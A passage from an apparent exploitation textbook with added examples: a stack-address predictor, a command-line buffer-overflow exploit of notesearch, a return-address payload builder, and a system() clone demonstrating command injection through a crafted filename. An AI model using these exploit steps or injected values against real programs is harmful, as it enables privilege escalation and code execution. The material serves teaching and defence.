#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char *ptr;

    if(argc < 3) {
        printf("Usage: %s <environment var> <target program name>\n", argv[0]);
        exit(0);
    }
    ptr = getenv(argv[1]); /* Get env var location. */
    if(ptr == NULL) {      /* Not set: there is no address to adjust. */
        printf("%s is not set in the environment\n", argv[1]);
        exit(1);
    }
    ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}
When compiled, this program can accurately predict where an environment
variable will be in memory during a target program's execution. This can be
used to exploit stack-based buffer overflows without the need for a NOP sled.
reader@hacking:~/booksrc $ gcc -o getenvaddr getenvaddr.c
reader@hacking:~/booksrc $ ./getenvaddr SLEDLESS ./notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
As you can see, exploit code isn't always needed to exploit programs. The
use of environment variables simplifies things considerably when exploiting
from the command line, but these variables can also be used to make exploit
code more reliable.
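The two pieces of the transcript above that are easy to get wrong by hand, as an added example that is not code from the book: name_adjust() is getenvaddr.c's (length difference)*2 rule as a function, and build_payload() emits an address as repeated 32-bit little-endian bytes, which is what the perl -e one-liner does. The function names, the mkpayload program and its command line are this example's own. It assumes 32-bit stack addresses as on the page, a stack that is not randomized (stack address randomization invalidates the prediction entirely), and an address with no NUL byte, since a NUL would terminate the argument string before the repeated copies reach the saved return address.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Offset to add to the address getenvaddr observes in its own process so
 * it matches the target program: the same (len diff)*2 rule as
 * getenvaddr.c.  self and target are argv[0]-style names, so in the
 * transcript ("./getenvaddr" vs. "./notesearch") the adjustment is 0. */
long name_adjust(const char *self, const char *target) {
    return ((long)strlen(self) - (long)strlen(target)) * 2;
}

/* Write addr as a 32-bit little-endian value repeated count times into
 * out, which must hold 4*count bytes.  Returns the number of bytes
 * written.  For 0xbfffff3c and count 40 this is exactly the output of
 *     perl -e 'print "\x3c\xff\xff\xbf"x40'
 * Assumption: the address contains no 0x00 byte (0xbfffff3c does not);
 * a NUL would end the command-line argument early. */
size_t build_payload(uint32_t addr, size_t count, unsigned char *out) {
    size_t i;
    for (i = 0; i < count; i++) {
        out[4 * i + 0] = (unsigned char)(addr & 0xff);          /* lowest byte first */
        out[4 * i + 1] = (unsigned char)((addr >> 8) & 0xff);
        out[4 * i + 2] = (unsigned char)((addr >> 16) & 0xff);
        out[4 * i + 3] = (unsigned char)((addr >> 24) & 0xff);
    }
    return 4 * count;
}

/* Hypothetical tool: ./mkpayload <addr> <count>, e.g.
 *     ./notesearch "$(./mkpayload 0xbfffff3c 40)"
 * Raw bytes go to stdout so the shell substitution passes them as argv[1]. */
int main(int argc, char *argv[]) {
    uint32_t addr;
    size_t count, n;
    unsigned char *buf;

    if (argc < 3) {
        fprintf(stderr, "Usage: %s <addr> <count>\n", argv[0]);
        return 1;
    }
    addr = (uint32_t)strtoul(argv[1], NULL, 0);   /* accepts 0x... */
    count = (size_t)strtoul(argv[2], NULL, 10);
    buf = malloc(4 * count);
    if (buf == NULL)
        return 1;
    n = build_payload(addr, count, buf);
    fwrite(buf, 1, n, stdout);
    free(buf);
    return 0;
}
```

The little-endian byte order is why the transcript's address 0xbfffff3c appears as "\x3c\xff\xff\xbf" in the payload; getting it backwards overwrites the return address with 0x3cffffbf, which is not mapped.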
The system() function is used in the notesearch_exploit.c program to execute
a command. This function starts a new process and runs the command using
/bin/sh -c. The -c tells the sh program to execute commands from the
command-line argument passed to it. Google's code search (since discontinued)
could be used to find the source code for this function, which tells us more.
The code below was taken from
http://www.google.com/codesearch?q=package:libc+system.
Code from libc-2.2.2
#include <signal.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

int system(const char * cmd)
{
    int ret, pid, waitstat;
    void (*sigint) (), (*sigquit) ();

    if ((pid = fork()) == 0) {                  /* Child: hand the string to the shell. */
        execl("/bin/sh", "sh", "-c", cmd, NULL);
        exit(127);                              /* Only reached if execl() fails. */
    }
    if (pid < 0) return(127 << 8);              /* fork() failed: encoded like an exit of 127. */
    sigint = signal(SIGINT, SIG_IGN);           /* Parent ignores ^C and ^\ while the child runs. */
    sigquit = signal(SIGQUIT, SIG_IGN);
    while ((waitstat = wait(&ret)) != pid && waitstat != -1);
    if (waitstat == -1) ret = -1;
    /* The excerpt on this page ends at the wait loop; the remaining lines
       restore the two saved handlers and return the child's wait status. */
    signal(SIGINT, sigint);
    signal(SIGQUIT, sigquit);
    return(ret);
}
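To see what "runs the command using /bin/sh -c" means for a caller, here is an added example (not libc code and not from the book): my_system() is a clone of the quoted function with the same fork/execl/wait shape, and shell_exit_code() decodes the wait status it returns. The function names, run_ls_on() and the constructed filename "/ >/dev/null; exit 42" are this example's own. It assumes /bin/sh exists.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Clone of the libc-2.2.2 system() quoted above, written as an illustration.
 * Differences: waitpid() on the child's pid instead of a wait() loop, EINTR
 * retried, the child uses _exit() so inherited stdio buffers are not flushed
 * a second time, and the saved SIGINT/SIGQUIT handlers are restored. */
int my_system(const char *cmd) {
    pid_t pid;
    int status = -1;
    void (*old_int)(int), (*old_quit)(int);

    pid = fork();
    if (pid == 0) {
        /* Child: the entire string is parsed by the shell, metacharacters
         * (';', '|', '$(...)', redirections) included. */
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);                 /* only reached if execl() fails */
    }
    if (pid < 0)
        return 127 << 8;            /* fork() failed: same encoding as an exit of 127 */

    old_int = signal(SIGINT, SIG_IGN);   /* as in libc: the parent ignores ^C and ^\ */
    old_quit = signal(SIGQUIT, SIG_IGN);
    while (waitpid(pid, &status, 0) == -1) {
        if (errno != EINTR) {
            status = -1;
            break;
        }
    }
    signal(SIGINT, old_int);
    signal(SIGQUIT, old_quit);
    return status;
}

/* Exit code of a command run through my_system(), or -1 if it did not exit
 * normally (killed by a signal, or wait failed).  The raw status is the
 * wait(2) encoding, hence the WIFEXITED/WEXITSTATUS macros. */
int shell_exit_code(const char *cmd) {
    int st = my_system(cmd);
    if (st == -1 || !WIFEXITED(st))
        return -1;
    return WEXITSTATUS(st);
}

/* The consequence of going through sh -c: a program that splices a
 * user-supplied name into a command string has handed the shell a second
 * command if the name contains ';'.  With a benign name the result is ls's
 * exit code; with the constructed name "/ >/dev/null; exit 42" it is 42. */
int run_ls_on(const char *filename) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "ls %s >/dev/null 2>&1", filename);
    return shell_exit_code(cmd);
}

int main(void) {
    printf("exit 3                   -> %d\n", shell_exit_code("exit 3"));
    printf("ls /                     -> %d\n", run_ls_on("/"));
    printf("ls with injected name    -> %d\n", run_ls_on("/ >/dev/null; exit 42"));
    printf("shell killed by SIGKILL  -> %d\n", shell_exit_code("kill -9 $$"));
    return 0;
}
```

The exploit in the text relies on exactly this behaviour on purpose; the same behaviour is the bug when the string comes from an attacker, which is why execv()-style calls with an argument vector are preferred to system() whenever any part of the command is untrusted.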